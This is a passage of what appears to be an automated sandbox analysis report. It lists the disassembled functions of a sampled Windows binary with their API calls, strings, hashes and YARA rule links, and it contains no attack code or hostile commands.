                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A9D221
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A9D2AD
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A9D2E1
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9D2EE
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A9D3C0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5728f4ffee89e854ab476e5b06241ff375b06bd69ea036761ff54c13d6a6aefa
                                                                                                                                                                                                                                                                                                    • Instruction ID: 630d9d0368c6988a8e057f507c8d79a22200dbaa3e79fa79ada9e339116a3ce1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5728f4ffee89e854ab476e5b06241ff375b06bd69ea036761ff54c13d6a6aefa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 591269357046019FCB14DF14C981A6ABBE5FF89754F04885DF88A9B3A2CB35ED81CB81
                                                                                                                                                                                                                                                                                                    Function 00AA13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00AA1462
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA149D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AA14F0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA1526
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA15A2
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA161D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2FD52: _wcslen.LIBCMT ref: 00A2FD5D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A73535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A73547
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                                    • Opcode ID: 22a4dc0398b6998d418dd811d2f6dbaa90cbc8510636ea8a243b09b157ce07bc
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9d712732d137c3f4091c51638e1ca7abc563b437abf0cdb6ffb5e84847427060
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22a4dc0398b6998d418dd811d2f6dbaa90cbc8510636ea8a243b09b157ce07bc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BE1AF71608301AFCB14DF28C55096AB7F2BF9A314F14895DF8969B3A2DB34ED45CB81
                                                                                                                                                                                                                                                                                                    Function 00A9D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                    • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                                    • Opcode ID: cf9b214053c203bcab17e21d244921b1943d8bc54e0ea8f5e01c0d4dad2db0c6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3b4c177469ae6d2193f84284025b0d56e1a98233f4876ed93a5e2d997ac75925
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf9b214053c203bcab17e21d244921b1943d8bc54e0ea8f5e01c0d4dad2db0c6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD71D6327105268BCF109F7CCA415FB33E2AB61758F220525F8569B294EA35DDC5C7A0
                                                                                                                                                                                                                                                                                                    Function 00AA8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA8DB5
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA8DC9
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA8DEC
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA8E0F
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AA8E4D
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AA6691), ref: 00AA8EA9
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AA8EE2
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AA8F25
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AA8F5C
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00AA8F68
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AA8F78
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00AA6691), ref: 00AA8F87
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AA8FA4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AA8FB0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                    • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9f8bfaec8a49cf35b02744c25536e354aa94ab1b869a45e345fcb0647efcc922
                                                                                                                                                                                                                                                                                                    • Instruction ID: fd19325606db2c71312af7131544a6d62796947a1aac0c0a3409fcde697f0cfd
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f8bfaec8a49cf35b02744c25536e354aa94ab1b869a45e345fcb0647efcc922
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4661AE71900616BEEB24DF64CC45BBE77A8BF0AB10F10450AF915D71D1DB79EA90CBA0
                                                                                                                                                                                                                                                                                                    Function 00A848BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00A8493D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A84948
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A8499F
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A849DD
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00A84A1B
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A84A63
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A84A9E
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A84ACC
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7569802168c9e88580483bb1c20bedb48d7d53b59083b5e9c00dfeead70285ba
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8a2c9270306192e31c4c272aef3b61754a52474cab0b24bce8e4a7fd74befd34
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7569802168c9e88580483bb1c20bedb48d7d53b59083b5e9c00dfeead70285ba
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E71D2325082129FC714EF24C9809AFBBE4FF987A8F50492DF89697251EB31DD85CB91
                                                                                                                                                                                                                                                                                                    Function 00A76382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00A76395
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A763A7
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00A763BE
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00A763D3
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00A763D9
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00A763E9
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00A763EF
                                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A76410
                                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A7642A
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A76433
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7649A
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00A764D6
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A764DC
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00A764E3
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A7653A
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00A76547
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00A7656C
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A76596
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: bff810579c81bbd63eacf5fb38deaaaae6b9af881322949ba1c0b4aab4ebd9d2
                                                                                                                                                                                                                                                                                                    • Instruction ID: 46a2b43f53032c92d21afe242673031be1708f228013efef2fa542624b29c4ab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bff810579c81bbd63eacf5fb38deaaaae6b9af881322949ba1c0b4aab4ebd9d2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74718F31900B06EFDB20DFA8CE45BAEBBF5FF48704F108918E58AA65A0D775E945CB50
                                                                                                                                                                                                                                                                                                    Function 00A9086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00A90884
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00A9088F
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00A9089A
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00A908A5
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00A908B0
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00A908BB
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00A908C6
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00A908D1
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00A908DC
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00A908E7
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00A908F2
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00A908FD
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00A90908
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00A90913
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00A9091E
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00A90929
                                                                                                                                                                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00A90939
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A9097B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 25ad01831072b66491b9fe0b9c8a7c477fe22cc6d22b8c6f13acd6999ff4fd4f
                                                                                                                                                                                                                                                                                                    • Instruction ID: cbde8dbbe88334a917449890c5a111a9b0865808ae6fc2bb0e4829ba65ce3d3d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25ad01831072b66491b9fe0b9c8a7c477fe22cc6d22b8c6f13acd6999ff4fd4f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5415370E083196EDB10DFBA8C85C5EBFE8BF04754B50452AA159E7281DB789801CF91
                                                                                                                                                                                                                                                                                                    Function 00A30436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A30436
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00AE170C,00000FA0,F0A49CFC,?,?,?,?,00A52733,000000FF), ref: 00A3048C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A52733,000000FF), ref: 00A30497
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A52733,000000FF), ref: 00A304A8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A304BE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A304CC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A304DA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A30505
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A30510
                                                                                                                                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00A30457
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A30413: __onexit.LIBCMT ref: 00A30419
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 00A304D2
                                                                                                                                                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 00A304C4
                                                                                                                                                                                                                                                                                                    • InitializeConditionVariable, xrefs: 00A304B8
                                                                                                                                                                                                                                                                                                    • kernel32.dll, xrefs: 00A304A3
                                                                                                                                                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A30492
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                    • Opcode ID: a4b2fb4ebe33e7686b3ff44f17a029de7d448f75cb530feb14b13aa27f73ed55
                                                                                                                                                                                                                                                                                                    • Instruction ID: 798c5c4e552480f5ceff27f360a700d0f8b94119f770b838176105e326565edc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4b2fb4ebe33e7686b3ff44f17a029de7d448f75cb530feb14b13aa27f73ed55
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4212B32A807157FD720ABE4AC56FAA7798FF05F61F004625F906D76D0DB749C028E51
                                                                                                                                                                                                                                                                                                    Function 00A73A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                    • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                                    • Opcode ID: f606d13710aecaddfc27215597e6049007bf33155c07eeab5195c675669d1017
